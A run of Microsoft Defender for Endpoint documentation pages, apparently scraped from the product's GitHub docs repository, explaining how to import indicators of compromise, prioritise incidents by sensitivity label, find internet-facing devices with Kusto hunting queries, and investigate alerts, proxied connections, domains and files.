-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://www.microsoft.com/WindowsForBusiness/windows-atp?ocid=docs-wdatp-automationexclusionlist-abovefoldlink)
-
-1. In the navigation pane, select **Settings** \> **Endpoints** \> **Indicators** (under **Rules**).
-
-2. Select the tab of the entity type you'd like to manage.
-
-3. Update the details of the indicator and select **Save** or select the **Delete** button if you'd like to remove the entity from the list.
-
-## Import a list of IoCs
-
-You can also choose to upload a CSV file that defines the attributes of indicators, the action to be taken, and other details.
-
-Download the sample CSV to know the supported column attributes.
-
-1. In the navigation pane, select **Settings** \> **Endpoints** \> **Indicators** (under **Rules**).
-
-2. Select the tab of the entity type you'd like to import indicators for.
-
-3. Select **Import** \> **Choose file**.
-
-4. Select **Import**. Repeat for all the files you'd like to import.
-
-5. Select **Done**.
-
-> [!NOTE]
-> Only 500 indicators can be uploaded for each batch.
->
-> Attempting to import indicators with specific categories requires the string to be written in Pascal case convention and only accepts the category list available at the portal.
-
-The following table shows the supported parameters.
-
-| Parameter|Type|Description |
-| | | |
-| indicatorType|Enum|Type of the indicator. Possible values are: *FileSha1*, *FileSha256*, *IpAddress*, *DomainName*, and *Url*. **Required** |
-| indicatorValue|String|Identity of the [Indicator](ti-indicator.md) entity. **Required** |
-| action|Enum|The action that is taken if the indicator is discovered in the organization. Possible values are: *Allowed*, *Audit*, *BlockAndRemediate*, *Warn*, and *Block*. **Required** |
-| title|String|Indicator alert title. **Required** |
-| description|String| Description of the indicator. **Required** |
-| expirationTime|DateTimeOffset|The expiration time of the indicator in the following format YYYY-MM-DDTHH:MM:SS.0Z. The indicator gets deleted if the expiration time passes and whatever happens at the expiration time occurs at the seconds (SS) value. **Optional** |
-| severity|Enum|The severity of the indicator. Possible values are: *Informational*, *Low*, *Medium*, and *High*. **Optional** |
-| recommendedActions|String|TI indicator alert recommended actions. **Optional** |
-| rbacGroups|String|Comma-separated list of RBAC groups the indicator would be applied to. **Optional** |
-| category|String|Category of the alert. Examples include: Execution and credential access. **Optional** |
-| mitretechniques|String|MITRE techniques code/id (comma separated). For more information, see [Enterprise tactics](https://attack.mitre.org/tactics/enterprise/). **Optional** It's recommended to add a value in category when a MITRE technique. |
-| GenerateAlert|String|Whether the alert should be generated. Possible Values are: True or False. **Optional** |
-
-> [!NOTE]
-> Classless Inter-Domain Routing (CIDR) notation for IP addresses is not supported.
-For more information, see [Microsoft Defender for Endpoint alert categories are now aligned with MITRE ATT&CK!](https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/microsoft-defender-atp-alert-categories-are-now-aligned-with/ba-p/732748).
-
-Watch this video to learn how Microsoft Defender for Endpoint provides multiple ways to add and manage Indicators of compromise (IoCs).
-> [!VIDEO https://www.microsoft.com/en-us/videoplayer/embed/RE4qLVw]
-
-## See also
--- [Create indicators](manage-indicators.md)-- [Create indicators for files](indicator-file.md)-- [Create indicators for IPs and URLs/domains](indicator-ip-domain.md)-- [Create indicators based on certificates](indicator-certificates.md)-- [Exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus](defender-endpoint-antivirus-exclusions.md)
security Information Protection Investigation https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/information-protection-investigation.md
- Title: Use Microsoft Defender for Endpoint sensitivity labels to protect your data and prioritize security incident response
-description: Learn how to use Defender for Endpoint sensitivity labels to protect, prioritize, and investigate incidents that involve data loss, dlp, security incidents.
------- m365-security-- ContentEngagementFY23-- tier2-- Previously updated : 12/18/2020--
-# Microsoft Defender for Endpoint sensitivity labels protect and prioritize incident response
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
-
-A typical advanced persistent threat lifecycle (or APT) involves some data exfiltration -- the point at which data is *taken* from the organization. In those situations, sensitivity labels can tell security operations where to start by spelling out what data is highest priority to protect.
-
-Defender for Endpoint helps to make prioritization of security incidents simpler with the use of sensitivity labels too. For example, sensitivity labels quickly identify incidents that can involve devices with sensitive information on them (such as confidential information).
-
-Here's how to use sensitivity labels in Defender for Endpoint.
-
-## Investigate incidents that involve sensitive data on devices with Defender for Endpoint
-
-Learn how to use data sensitivity labels to prioritize incident investigation.
-
-> [!NOTE]
-> Labels are detected for Windows 10, version 1809 or later, and Windows 11.
-
-1. In Microsoft Defender portal, select **Incidents & alerts** \> **Incidents**.
-
-2. Scroll over to see the **Data sensitivity** column. This column reflects sensitivity labels that are observed on devices related to the incidents providing an indication of whether sensitive files are impacted by the incident.
-
- :::image type="content" source="media/data-sensitivity-column.png" alt-text="The Highly confidential option in the data sensitivity column" lightbox="media/data-sensitivity-column.png":::
-
- You can also filter based on **Data sensitivity**
-
- :::image type="content" source="media/data-sensitivity-filter.png" alt-text="The data sensitivity filter" lightbox="media/data-sensitivity-filter.png":::
-
-3. Open the incident page to further investigate.
-
- :::image type="content" source="media/incident-page.png" alt-text="The incident page details" lightbox="media/incident-page.png":::
-
-4. Select the **Devices** tab to identify devices storing files with sensitivity labels.
-
- :::image type="content" source="media/investigate-devices-tab.png" alt-text="The Device tab" lightbox="media/investigate-devices-tab.png":::
-
-5. Select the devices that store sensitive data and search through the timeline to identify which files might be impacted then take appropriate action to ensure that data is protected.
-
- You can narrow down the events shown on the device timeline by searching for data sensitivity labels. Doing this shows only events associated with files that the label name.
-
- :::image type="content" source="media/machine-timeline-labels.png" alt-text="The device timeline with narrowed down search results based on label" lightbox="media/machine-timeline-labels.png":::
-
-> [!TIP]
-> These data points are also exposed through the 'DeviceFileEvents' in advanced hunting, allowing advanced queries and schedule detection to take into account sensitivity labels and file protection status.
-
-## Related information about sensitivity labels
--- [Learn about sensitivity labels in Office 365](../../compliance/sensitivity-labels.md)-- [Learn to apply sensitivity label inside of email or Office](https://support.microsoft.com/office/apply-sensitivity-labels-to-your-files-and-email-in-office-2f96e7cd-d5a4-403b-8bd7-4cc636bae0f9)-- [Learn how to use sensitivity labels as a condition when applying Data Loss Prevention](../../compliance/dlp-sensitivity-label-as-condition.md)
security Internet Facing Devices https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/internet-facing-devices.md
- Title: Identify internet-facing devices in Microsoft Defender for Endpoint
-description: Identify internet-facing devices in the device inventory list
------- m365-security-- tier2- Previously updated : 07/10/2023--
-# Internet-facing devices
-
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-- [Microsoft Defender for Business](/microsoft-365/security/defender-business)-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-respondmachine-abovefoldlink)
-
-As threat actors continuously scan the web to detect exposed devices they can exploit to gain a foothold in internal corporate networks, mapping your organization's external attack surface is a key part of your security posture management. Devices that can be connected to or are approachable from the outside pose a threat to your organization.
-
-Microsoft Defender for Endpoint automatically identifies and flags onboarded, exposed, internet-facing devices in the [Microsoft Defender portal](https://security.microsoft.com/). This critical information provides increased visibility into an organization's external attack surface and insights into asset exploitability.
-
-> [!NOTE]
-> Currently, only Windows devices onboarded to Microsoft Defender for Endpoint can be identified as internet-facing. Support for other platforms will be available in upcoming releases.
-
-## Devices flagged as internet-facing
-
-Devices that are successfully connected through TCP or identified as host reachable through UDP will be flagged as internet-facing in the [Microsoft Defender portal](https://security.microsoft.com). Defender for Endpoint uses different data sources to identify the devices to flag:
--- External scans are used to identify which devices are approachable from the outside.-- Device network connections, captured as part of Defender for Endpoint signals, help to identify external incoming connections that reach internal devices.-
-Devices can be flagged as internet-facing when a configured firewall policy (host firewall rule or enterprise firewall rule) allows inbound internet communication.
-
-Understanding your firewall policy, and your devices that are intentionally internet-facing as opposed to those that may compromise your organization, provides critical information when it comes to mapping your external attack surface.
-
-## View internet-facing devices
-
-For each onboarded device identified as internet-facing, the internet facing tag appears in the **Tags** column in the device inventory in the Microsoft Defender portal. To view internet-facing devices:
-
-1. Go to **Assets** \> **Device** in the [Microsoft Defender portal](https://security.microsoft.com/machines/).
-
- :::image type="content" source="../../media/defender-endpoint/internet-facing-tag.png" alt-text="Screenshot of the internet-facing tag" lightbox="../../media/defender-endpoint/internet-facing-tag.png":::
-
-Hover over the internet-facing tag to see why it was applied, possible reasons are:
--- This device was detected by an external scan-- This device received external incoming communication-
-At the top of the page, you can view a counter that shows the number of devices that have been identified as internet-facing and are potentially less secure.
-
-You can use filters to focus in on internet-facing devices and investigate the risk they may introduce into your organization.
-
- :::image type="content" source="../../media/defender-endpoint/internet-facing-filter.png" alt-text="Screenshot of the internet-facing filter" lightbox="../../media/defender-endpoint/internet-facing-filter.png":::
-
-> [!NOTE]
-> If no new events for a device occur for 48 hours, the Internet-facing tag is removed and it will no longer be visible in the Microsoft Defender portal.
-
-## Investigate your internet-facing devices
-
-To learn more about an internet-facing device, select the device in the device inventory to open its flyout pane:
-
- :::image type="content" source="../../media/defender-endpoint/internet-facing-details.png" alt-text="Screenshot of the internet facing device details page" lightbox="../../media/defender-endpoint/internet-facing-details.png":::
-
-This pane includes details on whether the device was detected by a Microsoft external scan or received an external incoming communication. The external network interface address and port fields provide details on the external IP and port that were scanned at the time this device was identified as internet facing.
-
-The local network interface address and port for this device, along with the last time the device was identified as internet facing are also shown.
-
-## Use advanced hunting
-
-Use advanced hunting queries to gain visibility and insights into the internet-facing devices in your organization, for example:
-
-### Get all internet facing devices
-
-Use this query to find all devices that are internet facing.
-
-```kusto
-// Find all devices that are internet-facing
-DeviceInfo
-| where Timestamp > ago(7d)
-| where IsInternetFacing
-| extend InternetFacingInfo = AdditionalFields
-| extend InternetFacingReason = extractjson("$.InternetFacingReason", InternetFacingInfo, typeof(string)), InternetFacingLocalPort = extractjson("$.InternetFacingLocalPort", InternetFacingInfo, typeof(int)), InternetFacingScannedPublicPort = extractjson("$.InternetFacingPublicScannedPort", InternetFacingInfo, typeof(int)), InternetFacingScannedPublicIp = extractjson("$.InternetFacingPublicScannedIp", InternetFacingInfo, typeof(string)), InternetFacingLocalIp = extractjson("$.InternetFacingLocalIp", InternetFacingInfo, typeof(string)), InternetFacingTransportProtocol=extractjson("$.InternetFacingTransportProtocol", InternetFacingInfo, typeof(string)), InternetFacingLastSeen = extractjson("$.InternetFacingLastSeen", InternetFacingInfo, typeof(datetime))
-| summarize arg_max(Timestamp, *) by DeviceId
-```
-
-This query returns the following fields for each internet-facing device with their aggregated evidence in the "AdditionalFields" column.
--- **InternetFacingReason**: Whether the device was detected by an external scan or received incoming communication from the internet-- **InternetFacingLocalIp**: The local IP address of the internet facing interface-- **InternetFacingLocalPort**: The local port where internet facing communication was observed-- **InternetFacingPublicScannedIp**: The public IP address that was externally scanned-- **InternetFacingPublicScannedPort**: The internet facing port that was externally scanned-- **InternetFacingTransportProtocol**: The transport protocol used (TCP/UDP)-
-### Get information on inbound connections
-
-For TCP connections, you can gain further insights into applications or services identified as listening on a device by querying [DeviceNetworkEvents](../defender/advanced-hunting-devicenetworkevents-table.md).
-
-Use the following query for devices tagged with the reason **This device received external incoming communication**:
-
-```kusto
-// Use this function to obtain the device incoming communication from public IP addresses
-// Input:
-// DeviceId - the device ID that you want to investigate.
-// The function will return the last 7 days of data.
-InboundExternalNetworkEvents("<DeviceId>")
-```
-
->[!Note]
-> Process related information is only available for TCP connections.
-
-Use the following query for devices tagged with the reason **This device was detected by an external scan**:
-
-```kusto
-DeviceNetworkEvents
-| where Timestamp > ago(7d)
-| where DeviceId == ""
-| where Protocol == "Tcp"
-| where ActionType == "InboundInternetScanInspected"
-```
-
-For UDP connections, gain insights into devices that were identified as host reachable but may not have established a connection (for example, as a result of the host firewall policy) using the following query:
-
-```kusto
-DeviceNetworkEvents
-| where Timestamp > ago(7d)
-| where DeviceId == ""
-| where Protocol == "Udp"
-| where ActionType == "InboundInternetScanInspected"
-```
-
-If the above queries fail to provide the relevant connections, you can use socket collection methods to retrieve the source process. To learn more about different tools and capabilities available to do this, see:
--- [Defender for Endpoint live response](live-response.md)-- [Microsoft Network Monitor](/troubleshoot/windows-client/networking/collect-data-using-network-monitor)-- [Netstat for Windows](/windows-server/administration/windows-commands/netstat)-
-## Report inaccuracy
-
-You can report an inaccuracy for a device with incorrect internet-facing information. For the internet-facing device:
-
-1. Open the device flyout from the Device inventory page
-2. Select **Report device inaccuracy**
-3. In the **What part is inaccurate** dropdown, select **Device information**
-4. For **Which information is inaccurate** select the **internet facing classification** checkbox from the dropdown
-5. Fill in the requested details about what the correct information should be
-6. Provide an email address (optional)
-7. Select **Submit Report**
-
-## See also
--- [Device inventory](machines-view-overview.md)-
security Investigate Alerts https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/investigate-alerts.md
- Title: Investigate Microsoft Defender for Endpoint alerts
-description: Use the investigation options to get details on alerts are affecting your network, what they mean, and how to resolve them.
------- m365-security-- tier2-- mde-edr- Previously updated : 04/24/2018---
-# Investigate alerts in Microsoft Defender for Endpoint
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-investigatealerts-abovefoldlink)
-
-Investigate alerts that are affecting your network, understand what they mean, and how to resolve them.
-
-Select an alert from the alerts queue to go to alert page. This view contains the alert title, the affected assets, the details side pane, and the alert story.
-
-From the alert page, begin your investigation by selecting the affected assets or any of the entities under the alert story tree view. The details pane automatically populates with further information about what you selected. To see what kind of information you can view here, read [Review alerts in Microsoft Defender for Endpoint](/microsoft-365/security/defender-endpoint/review-alerts).
-
-## Investigate using the alert story
-
-The alert story details why the alert was triggered, related events that happened before and after, as well as other related entities.
-
-Entities are clickable and every entity that isn't an alert is expandable using the expand icon on the right side of that entity's card. The entity in focus will be indicated by a blue stripe to the left side of that entity's card, with the alert in the title being in focus at first.
-
-Expand entities to view details at a glance. Selecting an entity will switch the context of the details pane to this entity, and will allow you to review further information, as well as manage that entity. Selecting *...* to the right of the entity card will reveal all actions available for that entity. These same actions appear in the details pane when that entity is in focus.
-
-> [!NOTE]
-> The alert story section may contain more than one alert, with additional alerts related to the same execution tree appearing before or after the alert you've selected.
--
-## Take action from the details pane
-
-Once you've selected an entity of interest, the details pane will change to display information about the selected entity type, historic information when it's available, and offer controls to **take action** on this entity directly from the alert page.
-
-Once you're done investigating, go back to the alert you started with, mark the alert's status as **Resolved** and classify it as either **False alert** or **True alert**. Classifying alerts helps tune this capability to provide more true alerts and less false alerts.
-
-If you classify it as a true alert, you can also select a determination, as shown in the image below.
--
-If you are experiencing a false alert with a line-of-business application, create a suppression rule to avoid this type of alert in the future.
--
-> [!TIP]
-> If you're experiencing any issues not described above, use the 🙂 button to provide feedback or open a support ticket.
-
-## Related topics
--- [View and organize the Microsoft Defender for Endpoint Alerts queue](alerts-queue.md)-- [Manage Microsoft Defender for Endpoint alerts](manage-alerts.md)-- [Investigate a file associated with a Defender for Endpoint alert](investigate-files.md)-- [Investigate devices in the Defender for Endpoint Devices list](investigate-machines.md)-- [Investigate an IP address associated with a Defender for Endpoint alert](investigate-ip.md)-- [Investigate a domain associated with a Defender for Endpoint alert](investigate-domain.md)-- [Investigate a user account in Defender for Endpoint](investigate-user.md)
security Investigate Behind Proxy https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/investigate-behind-proxy.md
- Title: Investigate connection events that occur behind forward proxies
-description: Learn how to use advanced HTTP level monitoring through network protection in Microsoft Defender for Endpoint, which surfaces a real target, instead of a proxy.
------- m365-security-- tier2-- mde-edr-- Previously updated : 12/18/2020--
-# Investigate connection events that occur behind forward proxies
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-investigatemachines-abovefoldlink)
-
-Defender for Endpoint supports network connection monitoring from different levels of the network stack. A challenging case is when the network uses a forward proxy as a gateway to the Internet.
-
-The proxy acts as if it was the target endpoint. In these cases, simple network connection monitors audit the connections with the proxy that is correct but has lower investigation value.
-
-Defender for Endpoint supports advanced HTTP level monitoring through network protection. When turned on, a new type of event is surfaced which exposes the real target domain names.
-
-## Use network protection to monitor network connection behind a firewall
-
-Monitoring network connection behind a forward proxy is possible due to other network events that originate from network protection. To see them on a device timeline, turn on network protection (at the minimum in audit mode).
-
-Network protection can be controlled using the following modes:
--- **Block**: Users or apps are blocked from connecting to dangerous domains. You'll be able to see this activity in Microsoft Defender XDR.-- **Audit**: Users or apps won't be blocked from connecting to dangerous domains. However, you'll still see this activity in Microsoft Defender XDR.--
-If you turn off network protection, users or apps won't be blocked from connecting to dangerous domains. You won't see any network activity in Microsoft Defender XDR.
-
-If you don't configure it, network blocking is turned off by default.
-
-For more information, see [Enable network protection](enable-network-protection.md).
-
-## Investigation impact
-
-When network protection is turned on, you'll see that on a device's timeline the IP address keeps representing the proxy, while the real target address shows up.
--
-Other events triggered by the network protection layer are now available to surface the real domain names even behind a proxy.
-
-Event's information:
--
-## Hunt for connection events using advanced hunting
-
-All new connection events are available for you to hunt on through advanced hunting as well. Since these events are connection events, you can find them under the DeviceNetworkEvents table under the `ConnecionSuccess` action type.
-
-Using this simple query shows you all the relevant events:
-
-```console
-DeviceNetworkEvents
-| where ActionType == "ConnectionSuccess"
-| take 10
-```
--
-You can also filter out events that are related to connection to the proxy itself.
-
-Use the following query to filter out the connections to the proxy:
-
-```console
-DeviceNetworkEvents
-| where ActionType == "ConnectionSuccess" and RemoteIP != "ProxyIP"
-| take 10
-```
-
-## Related articles
--- [Applying network protection with GP - policy CSP](/windows/client-management/mdm/policy-csp-defender#defender-enablenetworkprotection)
security Investigate Domain https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/investigate-domain.md
- Title: Investigate domains and URLs associated with an alert
-description: Use the investigation options to see if devices and servers have been communicating with malicious domains.
------- m365-security-- tier2-- mde-edr- Previously updated : 07/05/2023---
-# Investigate domains and URLs
---
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-investigatedomain-abovefoldlink)
-
-Investigate a domain to see if the devices and servers in your enterprise network have been communicating with a known malicious domain.
-
-You can investigate a URL or domain by using the search feature, from the incident experience (in evidence tab, or from the alert story), from advanced hunting, from the email page and side panel, or by clicking on the URL or domain link from the **Device timeline**.
-
-You can see information from the following sections in the URL and domain view:
--- Domain details, registrant contact information--- Microsoft verdict--- Incidents and alerts related to this URL or domain--- Prevalence of the URL or domain in the organization--- Most recent observed devices with URL or domain--- Most recent emails containing the URL or domain--- Most recent clicks to the URL or domain--
-## Domain entity
-
-You can pivot to the domain page from the domain details in the URL page or side panel, just click on **View domain page** link. The domain entity shows an aggregation of all the data from the URLs with the FQDN (Fully qualified domain name). For example, if one device is observed communicating with `sub.domain.tld/path1`, and another device is observed communicating with `sub.domain.tld/path2`, each URL of the above will show one device observation, and the domain will show the two device observations. In this case, a device that communicated with `othersub.domain.tld/path` won't correlate to this domain page, but to `othersub.domain.tld`.
-
-## URL and Domain overview
-
-The URL worldwide section lists the URL, a link to further details at whois, the number of related open incidents, and the number of active alerts, the number of affected devices, emails, and the number of user clicks observed.
-
-### URL summary details
-
-Displays the original URL (existing URL information), with the query parameters and the application-level protocol. Below that you can find the full domain details, such as registration date, modification date and registrant contact info.
-
-Microsoft verdict of the URL or domain, a devices prevalence, emails and user clicks section. In this area, you can see the number of devices that communicated with the URL or domain in the last 30 days, and pivot to the first or last event in the device timeline right away. To investigate initial access or if there's still a malicious activity in your environment.
-
-### Incidents and alerts
-
-The Incident and alerts section displays a bar chart of all active alerts in incidents over the past 180 days.
-
-### Microsoft verdict
-
-The Microsoft verdict section displays the verdict of the URL or domain from Microsoft TI library. It shows if the URL or domain is already known as phishing or malicious entity.
-
-### Prevalence
-
-The Prevalence section provides the details on the prevalence of the URL within the organization, over the last 30 days, such and trend chart ΓÇô which shows the number of distinct devices that communicated with the URL or domain over a specific period of time. Below you can find details of the first and last device observations communicated with the URL in the last 30 days, where you can pivot to the device timeline right away, to investigate initial access from the phish link, or if there's still a malicious communication in your environment.
-
-## Incident and alerts
-
-![The incident and alerts tab provides a list of incidents that are associated with the URL or domain.](media/domain-incidents.png)
-
-The incident and alerts tab provides a list of incidents that are associated with the URL or domain. The table shown here is a filtered version of the incidents visible on the Incident queue screen, showing only incidents associated with the URL or domain, their severity, impacted assets and more.
-
-The incidents and alerts tab can be adjusted to show more or less information, by selecting **Customize columns** from the action menu above the column headers. The number of items displayed can also be adjusted, by selecting items per page on the same menu.
-
-## Devices
-
-![The device tab displays the number of distinct devices that communicated with the URL or domain over a specific period of time.](media/domain-device-overview.png)
-
-The Devices tab provides a chronological view of all the devices that were observed for a specific URL or a domain. This tab includes a trend chart and a customizable table listing device details, such as risk level, domain and more. Beyond that, you can see the first and last event times where the device interacted with the URL or domain, and the action type of this event. Using the menu next to the device name, you can quickly pivot to the device timeline to further investigate what happened before or after the event that involved this URL or domain.
-
-Although the default time period is the past 30 days, you can customize this from the drop-down available at the corner of the card. The shortest range available is for prevalence over the past day, while the longest range is over the past six months.
-
-Using the export button above the table, you can export all the data into a .csv file (including the first and last event time and action type), for further investigation and reporting.
-
-## Emails
-
-The Emails tab provides a detailed view of all the emails observed in the last 30 days that contained the URL or domain. This tab includes a trend chart and a customizable table listing email details, such as subject, sender, recipient, and more.
--
-## Clicks
-
-The Clicks tab provides a detailed view of all the clicks to the URL or domain observed in the last 30 days.
-
-### Investigate a URL or domain
-
-1. Select **URL** from the **Search bar** drop-down menu.
-
-2. Enter the URL in the **Search** field. Alternatively, you can navigate to the URL or domain from the **Incident attack story tab**, from the **device timeline**, through **advanced hunting**, or from the **email side panel and page**.
-
-3. Click the search icon or press **Enter**. Details about the URL are displayed.
-
- > [!NOTE]
- > Search results will only be returned for URLs observed in communications from devices in the organization.
-
-4. Use the search filters to define the search criteria. You can also use the timeline search box to filter the displayed results of all devices in the organization observed communicating with the URL, the file associated with the communication and the last date observed.
-
-5. Clicking any of the device names will take you to that device's view, where you can continue to investigate reported alerts, behaviors, and events.
-**
-6. If you disagree with the verdict of a URL or domain, you can report it to Microsoft as *clean*, *phishing*, or *malicious* by selecting **Submit to Microsoft for analysis.
--
-## Related articles
--- [View and organize the Microsoft Defender for Endpoint Alerts queue](alerts-queue.md)-- [Manage Microsoft Defender for Endpoint alerts](manage-alerts.md)-- [Investigate Microsoft Defender for Endpoint alerts](investigate-alerts.md)-- [Investigate a file associated with a Microsoft Defender for Endpoint alert](investigate-files.md)-- [Investigate devices in the Microsoft Defender for Endpoint Devices list](investigate-machines.md)-- [Investigate an IP address associated with a Microsoft Defender for Endpoint alert](investigate-ip.md)-- [Investigate a user account in Microsoft Defender for Endpoint](investigate-user.md)
security Investigate Files https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/investigate-files.md
- Title: Investigate Microsoft Defender for Endpoint files
-description: Use the investigation options to get details on files associated with alerts, behaviors, or events.
------- m365-security-- tier2-- mde-edr- Previously updated : 07/10/2023---
-# Investigate a file
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)--
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-investigatefiles-abovefoldlink)
-
-Investigate the details of a file associated with a specific alert, behavior, or event to help determine if the file exhibits malicious activities, identify the attack motivation, and understand the potential scope of the breach.
-
-There are many ways to access the detailed profile page of a specific file. For example, you can use the search feature, click on a link from the **Alert process tree**, **Incident graph**, **Artifact timeline**, or select an event listed in the **Device timeline**.
-
-Once on the detailed profile page, you can switch between the new and old page layouts by toggling **new File page**. The rest of this article describes the newer page layout.
-
-You can get information from the following sections in the file view:
--- File details and PE metadata (if it exists)-- Incidents and alerts-- Observed in organization-- File names-- File content and capabilities (if a file has been analyzed by Microsoft)-
-You can also take action on a file from this page.
-
-## File actions
-
-The file actions are above the file information cards at the top of the profile page. Actions you can perform here include:
--- Stop and quarantine-- Manage indicator-- Download file-- Ask Defender Experts-- Manual actions-- Go hunt-- Deep analysis-
-See [take response action on a file](respond-file-alerts.md) for more information on these actions.
-
-## File page overview
-
-The file page offers an overview of the file's details and attributes, the incidents and alerts where the file is seen, file names used, the number of devices where the file was seen in the last 30 days, including the dates when the file was first and last seen in the organization, Virus Total detection ratio, Microsoft Defender Antivirus detection, the number of cloud apps connected to the file, and the file's prevalence in devices outside of the organization.
-
-> [!NOTE]
-> Different users may see dissimilar values in the *devices in organization* section of the file prevalence card. This is because the card displays information based on the role-based access control (RBAC) scope that a user has. This means if a user has been granted visibility on a specific set of devices, they will only see the file organizational prevalence on those devices.
--
-## Incidents and alerts
-
-The **Incidents and alerts** tab provides a list of incidents that are associated with the file and the alerts the file is linked to. This list covers much of the same information as the incidents queue. You can choose what kind of information is shown by selecting **Customize columns**. You can also filter the list by selecting **Filter**.
-
-![Screenshot showing incidents and alerts.](https://user-images.githubusercontent.com/96785904/200527005-1fd139dc-7483-4e4c-83ad-855cd198f153.png)
--
-## Observed in organization
-
-The **Observed in organization** tab shows you the devices and cloud apps observed with the file. File history related to devices can be shown up to the last six months, whereas cloud apps-related history is up to the last 30 days
-
-### Devices
-
-This section shows all the devices where the file is detected. The section includes a trending report identifying the number of devices where the file has been observed in the past 30 days. Below the trendline, you can find detailed information on the file on each device where it is seen, including file execution status, first and last seen events on each device, initiating process and time, and file names associated with a device.
-
-You can click on a device on the list to explore the full six months file history on each device and pivot to the first seen event in the device timeline.
--
-### Cloud apps
-
-> [!NOTE]
-> The Defender for Cloud Apps workload must be enabled to see file information related to cloud apps.
-
-This section shows all the cloud applications where the file is observed. It also includes information like the file's names, the users associated with the app, the number of matches to a specific cloud app policy, associated apps' names, when the file was last modified, and the file's path.
--
-## File names
-
-The **File names** tab lists all names the file has been observed to use, within your organizations.
--
-## File content and capabilities
-
-> [!NOTE]
-> The file content and capabilities views depend on whether Microsoft analyzed the file.
-
-The File content tab lists information about portable executable (PE) files, including process writes, process creation, network activities, file writes, file deletes, registry reads, registry writes, strings, imports, and exports. This tab also lists all the file's capabilities.
--
-The file capabilities view lists a file's activities as mapped to the MITRE ATT&CK&trade; techniques.
--
-## Related topics
--- [View and organize the Microsoft Defender for Endpoint queue](alerts-queue.md)-- [Manage Microsoft Defender for Endpoint alerts](manage-alerts.md)-- [Investigate Microsoft Defender for Endpoint alerts](investigate-alerts.md)-- [Investigate devices in the Microsoft Defender for Endpoint Devices list](investigate-machines.md)-- [Investigate an IP address associated with a Microsoft Defender for Endpoint alert](investigate-ip.md)-- [Investigate a domain associated with a Microsoft Defender for Endpoint alert](investigate-domain.md)-- [Investigate a user account in Microsoft Defender for Endpoint](investigate-user.md)-- [Take response actions on a file](respond-file-alerts.md)
security Investigate Incidents https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/investigate-incidents.md
- Title: Investigate incidents in Microsoft Defender for Endpoint
-description: See associated alerts, manage the incident, and see alert metadata to help you investigate an incident
------- m365-security-- tier1-- mde-edr-- Previously updated : 01/24/2024--
-# Investigate incidents in Microsoft Defender for Endpoint
--
-**Applies to:**
